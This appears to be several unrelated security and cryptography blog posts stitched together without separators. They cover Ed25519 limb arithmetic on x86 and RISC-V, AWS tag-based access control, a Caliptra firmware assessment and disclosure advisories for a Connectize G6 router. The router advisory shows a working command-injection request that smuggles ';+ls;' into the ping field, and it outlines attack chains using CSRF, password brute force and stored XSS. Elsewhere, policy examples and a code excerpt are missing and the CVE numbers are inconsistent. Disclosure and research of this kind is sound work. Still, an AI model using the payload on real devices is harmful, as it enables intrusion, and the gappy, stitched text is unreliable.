crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works (i.e. it is a tad faster than curve25519-dalek) (note: not listed above is the fact that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost; crrl does not implement that feature yet). The point of this post is not to boast about how crrl is faster; its good performance should be taken as an indication that it is decently optimized and thus a correct illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other, on the two tested architectures.
curve25519-dalek has three backends:
serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 251x1 + 2102x2 + 2153x3 + 2204x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 251 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.
crrl has two backends:
m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2255 – 19 is performed before serializing).
The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:
let (e0, e1) = umull(a0, b0); let (e2, e3) = umull(a1, b1); let (e4, e5) = umull(a2, b2); let (e6, e7) = umull(a3, b3);
let (lo, hi) = umull(a0, b1); let (e1, cc) = addcarry_u64(e1, lo, 0); let (e2, cc) = addcarry_u64(e2, hi, cc); let (lo, hi) = umull(a0, b3); let (e3, cc) = addcarry_u64(e3, lo, cc); let (e4, cc) = addcarry_u64(e4, hi, cc); let (lo, hi) = umull(a2, b3); let (e5, cc) = addcarry_u64(e5, lo, cc); let (e6, cc) = addcarry_u64(e6, hi, cc); let (e7, _) = addcarry_u64(e7, 0, cc);
let (lo, hi) = umull(a1, b0); let (e1, cc) = addcarry_u64(e1, lo, 0); let (e2, cc) = addcarry_u64(e2, hi, cc); let (lo, hi) = umull(a3, b0); let (e3, cc) = addcarry_u64(e3, lo, cc); let (e4, cc) = addcarry_u64(e4, hi, cc); let (lo, hi) = umull(a3, b2); let (e5, cc) = addcarry_u64(e5, lo, cc); let (e6, cc) = addcarry_u64(e6, hi, cc); let (e7, _) = addcarry_u64(e7, 0, cc);
The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, map to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).
When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed a different code, which, in curve25519-dalek’s serial backend, looks like this:
let b1_19 = b[1] * 19; let b2_19 = b[2] * 19; let b3_19 = b[3] * 19; let b4_19 = b[4] * 19;
This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.
RISC-V
Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired from the older DEC Alpha, including in particular a large number of integer registers (32), one of which being fixed to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:
Add x and y, into z (ADD).
Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
Add c to z (ADD).
Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
Add t to d (ADD).
(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)
Thus, the add-with-carry is not only a high-latency sequence, but it also requires quite a few instructions, and instruction throughput may be a bottleneck. Out test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:
Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.
Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into a low (51 bits) and high (64 bits) parts. The straightforward Rust code looks like this (from curve25519-dalek):
let carry: u64 = (c4 >> 51) as u64; out[4] = (c4 as u64) & LOW_51_BIT_MASK;
On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, that can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SHR, SHL) and one bitwise OR to combine the results.
In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:
let a0 = a0 << 6; let b0 = b0 << 7; // ... let (c00, h00) = umull(a0, b0); let d0 = c00 >> 13;
Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:
let d0 = c00 >> 13; let d1 = (c01 >> 13) + (c10 >> 13); let d2 = (c02 >> 13) + (c11 >> 13) + (c20 >> 13); // ... let h0 = h00; let h1 = h01 + h10; let h2 = h02 + h11 + h20;
In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve2519-dalek’s serial backend on x86, but it quite improves the performance on RISC-V.
Conclusion
The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies is not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:
Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.
AWS allows tags, arbitrary key-value pairs, to be assigned to many resources. Tags can be used to categorize resources however you like. Some examples:
In an account holding multiple applications, a tag called “application” might be used to denote which application is associated with each resource.
A tag called “stage” might be used to separate resources belonging to alpha, beta, and production stages within a single account.
A tag called “cost-center” might be used to indicate which business unit is responsible for a resource. AWS’ billing can break down bills by tag, allowing customers to allocate costs from a shared account to the appropriate budgets.
Once you have tagged your resources, you can search and filter based on tags. That’s not very interesting from a security perspective. Far more interesting is using tags to implement attribute-based access control (ABAC).
Attribute-Based Access Control
The “normal” AWS authorization scheme is known as Role-Based Access Control (RBAC): you define “roles” corresponding to service or job functions (implemented as IAM Users or Roles) and assign them the privileges necessary for those functions. A disadvantage of this scheme is that when you add new resources to your environment, the privileges assigned to your principals may need to be modified. This doesn’t scale particularly well with large numbers of resources. Using resource-based permission policies rather than identity-based permission policies can help with this, but that doesn’t scale well with large numbers of principals (especially since AWS doesn’t allow permissions to be granted to groups using resource-based permission policies). Also, not all resources support resource-based permission policies.
An alternative authorization scheme is to assign tags to principals and resources then grant permissions based on the combinations of principal and resource tags. For instance, all principals tagged as belonging to project QuarkEagle can be allowed to access resources also tagged as belonging to project QuarkEagle, while principals tagged with project CrunchyNugget can only access resources also tagged CrunchyNugget. This approach isn’t suitable for all scenarios but can result in significantly fewer and smaller permission policies that rarely need to be updated even as new principals and resources are added to accounts. This scheme is known as “attribute-based access control” (ABAC) or “tag-based access control” (TBAC), depending on the source.
In practice, you’re not likely to want a “pure” ABAC environment: most ABAC deployments will combine it with elements of RBAC.
How AWS implements ABAC
Apart from tags themselves, there are no new fundamental concepts in AWS for ABAC. You still have principals and resources with identity-based and resource-based permission policies. However, instead of having a lot of specifics in the resource and principal fields, an ABAC permission policy will have wildcards in those fields with the real logic implemented using conditions. There are four main condition keys that relate to tagging:
aws:ResourceTag/<tag-name>: control access based the values of tags attached to the resource being accessed.
aws:RequestTag/<tag-name>: control the tag values that can be assigned to or removed from resources.
aws:TagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
aws:PrincipalTag/<tag-name>: control access based on the values of tags attached to the principal making the API request.
Some examples are in order to clarify how these condition keys are be used.
If a principal is only permitted to publish messages to SNS Topics belonging to project QuarkEagle, then it might have this permission policy statement:
This allows your principal to publish to any SNS Topic, so long as that Topic has a tag named “project” whose value is “QuarkEagle”. If tiy want to go a step farther, you could tag your principals with their associated projects and then use this permission policy statement instead:
Now any principal that has a tag named “project” with the value “QuarkEagle” can publish to any SNS topic whose “project” tag is also “QuarkEagle” and any principal whose “project” tag is “CrunchyNugget” can publish to any topic that is also tagged “CrunchyNugget” — no need for permission policies that know about every tag value in use.
If your principals can create and delete SNS Topics, then you should make sure that they can only create properly tagged ones and can only delete ones with the proper tags. Similarly, if you allow your principals to set or unset tags, then you probably don’t want to allow them to change the “project” tag values on their resources. To enforce that, you might give them permission policy statements like this:
The first statement permits the principal to create SNS Topics so long as the each new Topic’s “project” tag has the same value as the principal’s “project” tag. Setting a tag during resource creation requires the same sns:TagResource permission as setting one explicitly later, so we grant permission for both actions. During resource creation, the condition key aws:ResourceTag is set to the value specified for the tag to be created, so the two condition checks are very similar but both are necessary to prevent the principal from using sns:TagResource in unintended ways:
Without the check against aws:RequestTag, the principal would be able to assign arbitrary tag values to existing Topics that currently share the principal’s “project” tag (potentially giving away those Topics to someone else; this could allow one principal to elevate the privileges of another, useful in a scenario where someone has compromised two different principals, neither of which can do what the attacker wants).
Omitting the aws:ResourceTag check would allow the principal to re-tag arbitrary existing Topics to its “project” tag value (allowing it to take control of other Topics and likely elevating its privileges if the principal has other permissions allowing it to read from or write to Topics that share its “project” tag).
The second statement permits the principal to delete SNS Topics whose “project” tag have the same value as the caller’s “project” tag.
The third statement enables the principal to change the tags on existing SNS Topics. The first condition, using aws:ResourceTag, requires that the target Topic’s “project” tag have the same value as the caller’s “project” tag. The second condition, using aws:TagKeys, prevents the caller from changing the value of the Topic’s “project” tag. Note that due to the first statement, it’s still possible for the principal to set a Topic’s “project” tag, but only if the value is the caller’s “project” tag.
ABAC permissions policies are easy to get wrong. Even Amazon has difficulty with them: AWS’ public documentation contains a number of example permission policies similar to the first statement above that do not contain the “StringEquals”: { “aws:ResourceTag/project”: “${aws:PrincipalTag/project}” } condition. Make sure that any ABAC permission policies that you write or review cover all scenarios.
It’s also important that your principals can’t change the “project” tags on themselves. If you need to allow your principals to call iam:TagUser and iam:UntagUser (or their equivalents for Roles), then you should use similar permission policies to prevent them from removing or changing the values of their “project” tags.
If you want to enforce some order on what tags are applied, then you can use a permission policy statement such as the following to prevent principals from setting any tags other than “department”, “project”, and “stage” on SNS Topics:
A similar permission policy statement employing aws:RequestTag/… can be used to control the values that may be assigned to tags.
Some services offer a condition key that can be used to make a permission policy statement apply only during resource creation (such as EC2’s ec2:CreateAction); using such a condition in your Policies can make them simpler and easier to understand. For instance, the following permission statement allows a principal to create tagged EC2 resources without allowing any weird ec2:CreateTags abuses:
The first statement permits the caller to create a few different EC2 resources so long as they have the same “project” tag value as the caller. Actually setting that tag, even during resource creation, requires a permission for ec2:CreateTags, so the second statement allows the caller to create tags only from those resource-creation API actions. However, this approach has its own flaws: EC2 considers ec2:CreateTags to be a resource-creation action, so make sure that any wildcards that you use in the ec2:CreateAction condition check don’t match ec2:CreateTags.
With proper use of tagging, combined with separate VPCs, it may be possible to put separate applications and separate stages of each application in the same account without allowing, for instance, beta principals to access prod data. Not that I’d recommend this approach: getting the tagging right is a lot of work (and there are many gotchas; see below). If you’re building a new application, it’s usually safer (and easier) to just use separate accounts for each application and stage with cross-account access via Role assumption and VPC peering as needed. But it’s worth considering for big complicated accounts with access control problems: it may be less work to implement ABAC on top of existing applications than it is to disentangle a giant messy account.
Manipulating tags
AWS services that support tagging have API actions to add and remove tags from resources and to list the tags on a resource. Tagging support was added to many AWS services well after they were first released and ABAC support was grafted on later still. As a result, the implementation of tagging isn’t consistent between services.
The most common patterns for API action names are:
TagResource / UntagResource / ListTagsForResource: a single set of API actions for all taggable resources in the service. One of the arguments is a resource ARN; if the service supports more than one type of resource, it figures out the resource type and what to do from there based on the ARN. One or more tags can be set or removed at once. This seems to be the most common pattern, used by Lambda, SNS, DynamoDB, and other services. However, there is a lot of variation in the name of the tag-listing operation: sns:ListTagsForResource, lambda:ListTags, dynamodb:ListTagsOfResource, apigateway:GetTags, kms:ListResourceTags, etc. Some services don’t have a tag-listing operation at all, allowing tags to be retrieved only using other resource-description API actions (e.g., Secrets Manager). There are also several variations on this pattern:
AddTagsToResource / RemoveTagsFromResource / ListTagsForResource: these API actions tend to work just like in the above case only with different names. This pattern is used by RDS and SSM.
AddTags / RemoveTags / ListTags, used by CloudTrail.
CreateTags / DeleteTags / DescribeTags, used by EC2 and Workspaces. In EC2’s case, ec2:DescribeTags doesn’t operate on a single resource but rather returns information about every resource in EC2 (with optional filters to limit the response to certain specific resources, resource types, etc.).
Tag<Resource> / Untag<Resource> / List<Resource>Tags: separate sets of API actions for each taggable resource. You need to call the correct API action for the type of resource that you want to tag and provide a resource name or ARN. As above, you can generally set or remove one or more tags at once. This pattern is followed by IAM and SQS (some specific examples: iam:TagUser, sqs:UntagQueue, iam:ListRoleTags). Certificate Manager uses a variation on this pattern: acm:AddTagsToCertificate / acm:RemoveTagsFromCertificate / acm:ListTagsForCertificate.
Most resource-creation API actions allow tags to be assigned during resource creation. Assigning a tag this way requires the permission for the tag-setting API action in addition to the resource-creation API action. For instance, to create an SNS Topic, I need permission for the action “sns:CreateTopic“. If I set a tag on a Topic while creating it, then I also need permission for the action “sns:TagResource” even if I never directly call that API action. However, there may still be some resources that support tagging but cannot be tagged at creation or cannot be tagged when created using CloudFormation.
The syntax for setting tags using AWS CLI also differs between services. Most services’ resource-creation and tagging API actions use a “–tags” command-line argument followed by a list of tags to set, but how that list is formatted depends on the service. Some services (including SQS and Lambda) expect “–tags project=QuarkEagle,stage=beta” while others (such as SNS and SSM) expect an argument of the form “–tags Key=project,Value=QuarkEagle Key=stage,Value=beta“. EC2 is an exception; during resource creation, it uses a more elaborate form of the latter syntax: “–tag-specifications ‘ResourceType=security-group,Tags=[{Key=project,Value=QuarkEagle},{Key=stage,Value=beta}]’“.
If you were thinking that it would be really nice for AWS to provide a unified tagging API, you’re not alone. AWS Resource Groups has a tagging API that can operate on most AWS services that support tagging. Besides providing a generic interface to tagging and untagging, this service also provides ways to retrieve all tag keys and values currently in use by an account and to query resources by tag across multiple services. From AWS Console, you can use “aws resourcegrouptaggingapi tag-resources …” to apply tags to arbitrary resources. To do this, you need both a “tag:TagResources” permission and a tagging permission for the resource that you are trying to tag. Untagging is similar. The following is a minimal permission policy to allow a principal to apply tags to a specific SNS Topic (resource constraints aren’t supported on the tag:TagResources permission because the resources are not in the Resource Groups service):
S3 is the special snowflake; there’s a reason why I didn’t use it for my examples above. While most AWS services have API actions that add or remove individual tags, the S3 tagging API operates on the entire set of tags on the object at once: s3:PutObjectTagging and s3:PutBucketTagging replace the full set of tags on the target resource with the given set, while s3:RemoveObjectTagging and s3:RemoveBucketTagging remove all tags from the target resource. If an object has the tags “application”, “stage”, and “owner” and you want to change the value of “owner”, then your call to s3:PutObjectTagging needs to set the “owner” tag to its new value and the “application” and “stage” tags to their current values in order to not lose the other tags. Tags can be retrieved using s3:GetObjectTagging and s3:GetBucketTagging. Unfortunately, the Resource Groups Tagging API does not support objects in S3 so it does not provide a work-around for S3’s weird tagging implementation.
To make the S3 case even more complicated, both Buckets and objects can be tagged but S3 only supports ABAC on objects. Even that support is incomplete: ABAC is not supported for s3:PutObject, s3:DeleteObject, or s3:DeleteObjectVersion calls. S3 also doesn’t support the normal aws:ResourceTag, aws:RequestTag, and aws:TagKeys condition keys at all: you must use S3-specific condition keys:
s3:ExistingObjectTag/<tag-name>: control access based the values of tags attached to objects.
s3:RequestObjectTag/<tag-name>: control the tag values that can be assigned to or removed from objects.
s3:RequestObjectTagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
There may be other services with unusual tagging implementations; I haven’t checked all of them. EC2 has its own tagging condition key “ec2:ResourceTag” but that seems to be a synonym for aws:ResourceTag.
Limitations of AWS ABAC
Unfortunately, ABAC support across AWS is incomplete (though improving) and has many implementation inconsistencies across services. Quirks of AWS’ ABAC implementation include:
Some services do support tagging but don’t support ABAC; others support ABAC on only some types of resources or in some contexts. There may yet be some services that don’t support tagging at all. The following table, describing ABAC support for a number of frequently-encountered AWS services, is summarized from Amazon’s documentation:
Service
ABAC support?
EC2
Yes
S3
Partial support for objects using non-standard condition keys; no support for Buckets
Lambda
For Functions but not for other resource types
DynamoDB
No
RDS
Yes
IAM
Users and Roles only, with exceptions
Certificate Manager
Yes
Secrets Manager
Yes
KMS
Yes
CloudTrail
Yes
CloudWatch
Mostly
CloudFormation
Yes
API Gateway
Yes (though not for API authorization)
CloudFront
Yes
Route 53
No
SNS
Yes
SQS
Yes (added in fall 2022)
Details on some of those limitations:
IAM: it is not possible to limit who can pass a Role using tags on that Role. While it is tempting to try to limit overly-permissive iam:PassRole permissions by allowing principals to pass only Roles with specific tags, that won’t work.
S3: it is not possible to limit who can delete or overwrite an S3 object based on tags on that object, nor is it possible to control access to API actions that operate on Buckets using tags. S3 also doesn’t support the normal condition keys for tags, instead using its own.
CloudWatch Logs doesn’t support limitations on the tags that can be assigned to Log Groups and doesn’t support aws:ResourceTag/<tag-name> for logs:DescribeLogGroups.
As previously noted, the tagging APIs and available condition keys for tagging are not consistent, either in name or function, across all AWS services. As a result, make sure to thoroughly review or test ABAC policies, especially if they contain Deny rules based on tagging. It won’t do to attempt to restrict access to S3 objects using aws:ResourceTag/<tag-name> because that condition key won’t exist: you need to use s3:ExistingObjectTag/<tag-name>. It also won’t do to treat s3:PutObjectTagging like you do iam:TagUser in your permission policies because they work differently.
Also as noted above, AWS’ pattern of requiring a tagging permission to assign tags while creating a resource makes it altogether too easy to accidentally give principals excessive tagging permissions. Carefully review all permission policies that permit tagging during resource creation.
In most cases, tag names are case-sensitive: “Project” is a different tag than “project“. However, this is not entirely consistent across services. Tags on IAM Users and Roles (though not on other IAM resources) are case-insensitive.
Some services (such as Secrets Manager) won’t let a principal change a tag if that change would prevent that principal from accessing the resource after the change. Other services (such as SNS) do not have this restriction.
There are some random bugs and missing functionality in various services. SQS doesn’t support aws:ResourceTag in resource-based permission policies. EC2 doesn’t support aws:ResourceTag checks during resource creation; you must use the EC2-specific condition key ec2:CreateAction to protect your tag-on-create permissions for EC2. CloudTrail seems to support aws:ResourceTag only after Trail creation and doesn’t seem to support aws:RequestTag or aws:TagKeys at all. There are probably a few other similar bugs out there.
Hopefully AWS’ ABAC support will continue to improve over time.
During August and September of 2023, Microsoft engaged NCC Group to conduct a security assessment of Caliptra v0.9.
Caliptra is an open-source silicon IP block for datacenter-focused server-class ASICs. It serves as the internal root-of-trust for both measurement and identity of a system-on-chip. The main use cases for Caliptra are to assure integrity of mutable code, to authorize firmware updates, and to support secure platform configuration and lifecycle state transitions. Notably, Caliptra also implements the TCG DICE Protection Environment, enabling other entities within the SoC to leverage the unique device identity for their own security operations.
Our evaluation of Caliptra spanned the three primary components:
ROM: The immutable mask ROM, which executes when Caliptra is brought out of reset.
First Mutable Code: Started by the ROM, the FMC is responsible for loading the runtime.
Runtime Firmware: The services that Caliptra provides to the rest of the SoC.
Microsoft furnished NCC Group with several testing objectives and focus areas for this project. These requirements were related to upholding the properties of confidentiality, integrity, and availability for the DICE Protection Environment and its security-critical assets:
Ensure that the firmware loading and authentication processes cannot be bypassed.
Review DPE signing operations for side-channel information leakage, impacting the Unique Device Secret or Composite Device Identifier.
Prevent attacks that undermine DICE initialization and external firmware measurement.
Ensure that measurements cannot be silently dropped or excluded from DPE derivations.
Determine whether an attacker can malform the DPE context tree structure.
Determine whether risks are present due to leaving cryptographic material in memory.
Under debug, DPE certificates should not chain to vendor-signed DeviceID certificates.
Assess the effectiveness of Caliptra’s exploit mitigation technologies.
Assess the soundness of the fault injection countermeasures.
The assessment identified 26 vulnerabilities, which were promptly addressed by the Caliptra team prior to the publication of this report. Read the full report here:
Since May of this year, NCC Group has been collaborating with the OCP by sharing our expertise in hardware and firmware security to support the creation of the SAFE program and the definition of its testing methodologies and reporting outputs. NCC Group is an approved SAFE Security Review Provider.
Connectize’s G6 WiFi router was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local Wi-Fi network and browser. The Connectize G6 router is a general consumer Wi-Fi router with an integrated web admin interface for configuration, and is available for purchase by the general public. These vulnerabilities were discovered in firmware version 641.139.1.1256, and are believed to be present in all versions up to and including that version.
A total of seven vulnerabilities were uncovered, with links to the associated technical advisories, as well as detailed descriptions of each finding, below.
Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
Current Password Not Required When Changing Admin Password (CVE-2023-24052)
Attack Scenarios
The nature of these vulnerabilities allows a motivated attacker to perform an attack chain combining multiple of these issues, potentially leading to full unauthenticated access to the admin panel, a pivot point on the user’s home network for further attacks, and arbitrary JavaScript code execution in the victim’s browser.
Scenario 1 – Attacker Not on the Network
An attacker not present on the Wi-Fi network can obtain a foothold onto the network, as well as total admin panel compromise, via the following steps. First, the attacker sends a phishing email to the target. The email induces the victim into visiting the attacker’s website, and allows the attacker to send HTTP requests from the victim’s browser. If the victim is logged in to the administration panel of their router, the attacker can leverage CVE-2023-24048 to send requests to the web application on the victim’s behalf, effectively granting them administrative access at this time.
However, this is temporary – the attacker only has this access while the victim remains logged in to the administrative panel. The attacker’s next step is to change the victim’s password, guaranteeing them access to the admin panel and locking out the victim. They can perform this easily, as no prior passwords are required to perform this sensitive action (CVE-2023-24051).
From here, they can utilize CVE-2023-24046 to pivot their attack, as this vulnerability grants the attacker complete command line access to the router itself, and in doing so, gives the attacker a device on the victim’s network that they control. From here, they could transition to traditional network based post-exploitation attacks, such as sniffing traffic and attempting to exploit vulnerabilities on other machines in the network. Furthermore, due to the known insecure hashing algorithms used to protect the sensitive router credentials (CVE-2023-24047), they can ensure that even in the event they lose access to the admin panel, they can recover the password by checking the router’s /etc/passwd file.
Scenario 2 – Attacker on the Network
Alternatively, rather than starting with a targeted phishing attack, an attacker who already has access to the home network (such as a guest in the home) could attempt to elevate from a normal use to an administrator via brute force password guessing.
The admin panel has an account lockout preventing such things – after making three failed guesses, a user is informed they must wait 180 seconds before attempting another guess. However, as shown in (CVE-2023-24051), the attacker can refresh the browser to reset this timer, or could use automation to send these requests without the browser pop-up’s interference in the first place.
If the victim has set a strong password, this will still take a significant amount of time. However, as the router requires a minimum length of 5 characters rather than the industry-standard recommended minimum of 8 characters, it becomes a viable attack surface if the chosen password is weak. If the password was never changed from the default value – admin, the attacker can gain access in one guess (CVE-2023-24049).
They can, of course, also exploit any of the vulnerabilities noted under Scenario 1 in addition to the brute force approach.
Scenario 3 – Malware
Assuming our attacker has gained access to the admin panel, either via CSRF or via the brute force method, the attacker can choose to perform further exploits via cross-site scripting. They could choose to set the password for one of the two Wi-Fi networks (2.4 GHz or 5 GHz) to an exploit string, and upon the rightful admin logging in to investigate, the attacker is able to run arbitrary JavaScript on the attacker’s browser.
Disclosure
NCC Group attempted to get in contact with Connectize’s support team, reaching out via a customer support email address. After receiving no response to our initial email or a follow up email a reasonable amount of time later, it was decided to publicly release the following advisories in accordance with NCC Group’s responsible disclosure policies. From web searches and open source research, it appears that the Connectize vendor ceased trading some time in early 2023 – the last cached version of their website on the Internet archive was March 29th 2023. Their website no longer exists and there is no mechanism to contact them. The disclosure timeline can be found at the bottom of this page.
It is important that consumers are aware of the vulnerable Connectize devices. Any current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Similarly, for consumers looking to purchase a Wi-Fi router – be aware that at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background NCC Group is currently liaising with some of these online stores in an attempt at ensuring these devices are withdrawn from sale.
Technical Advisories
Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24046
Severity: High 8.4 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Summary
An attacker authenticated to the admin panel can run arbitrary commands on the physical device.
Impact
After exploitation, an attacker will have complete control over the target system, and will be in a position to perform post-exploitation tasks throughout the network.
Details
The ping functionality on the router diagnostics page http://192.168.5.1/diag_ping_admin.htm is used to set the IP address pings are sent to. However, an attacker can concatenate a command to the end of the address as follows, which then executes as a command on the underlying system.
The following request shows the output of the ls command, listing the files and directories at the root of the HTTP server.
Request
GET /getPingResult.asp?ip_version=0 target_addr=192.168.5.1;+ls; target_num=2 HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.5.1/diag_ping_admin.htm
Response
HTTP/1.1 200 OK
Date: Tue, 10 Jan 2023 22:59:36 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Content-Length: 371
Last-Modified: Tue, 10 Jan 2023 22:59:36 GMT
Content-Type: text/html
PING 192.168.5.1 (192.168.5.1): 56 data bytes
<br />64 bytes from 192.168.5.1: seq=0 ttl=64 time=0.293 ms
<br />64 bytes from 192.168.5.1: seq=1 ttl=64 time=0.262 ms
<br />
<br />--- 192.168.5.1 ping statistics ---
<br />2 packets transmitted, 2 packets received, 0% packet loss
<br />round-trip min/avg/max = 0.262/0.277/0.293 ms
<br />boa.conf
<br />mime.types
<br />
Observe the lines:
<br />boa.conf
<br />mime.types
<br />
These file names are present at the root of the /etc/boa directory of the router, indicating that the ls command successfully executed and the output was returned to the user.
An attacker can go further with this and construct a convenient user interface for interacting with the vulnerability in a shell-like manner. With such a shell an attacker can much more easily navigate the file system and run commands on the device. They can then elevate their access to something more direct, such as through activating the BusyBox Telnet functionality on the device and obtaining a telnet shell.
Recommendation
Connectize should implement input verification to be certain that the values passed to the target_addr parameter are only IP addresses, and do not contain any commands. Any value passed that is not an IP address or a domain name parameter should be dropped.
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24047
Severity: Medium 4.5 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
Summary
The same password used for logging into the web admin interface is used as the root password for the device. Furthermore, the password is stored insecurely on the device via an outdated and insecure hashing algorithm.
Impact
Anyone capable of accessing the router’s file system is able to trivially recover both the Root password for the device and the password for the admin panel.
Details
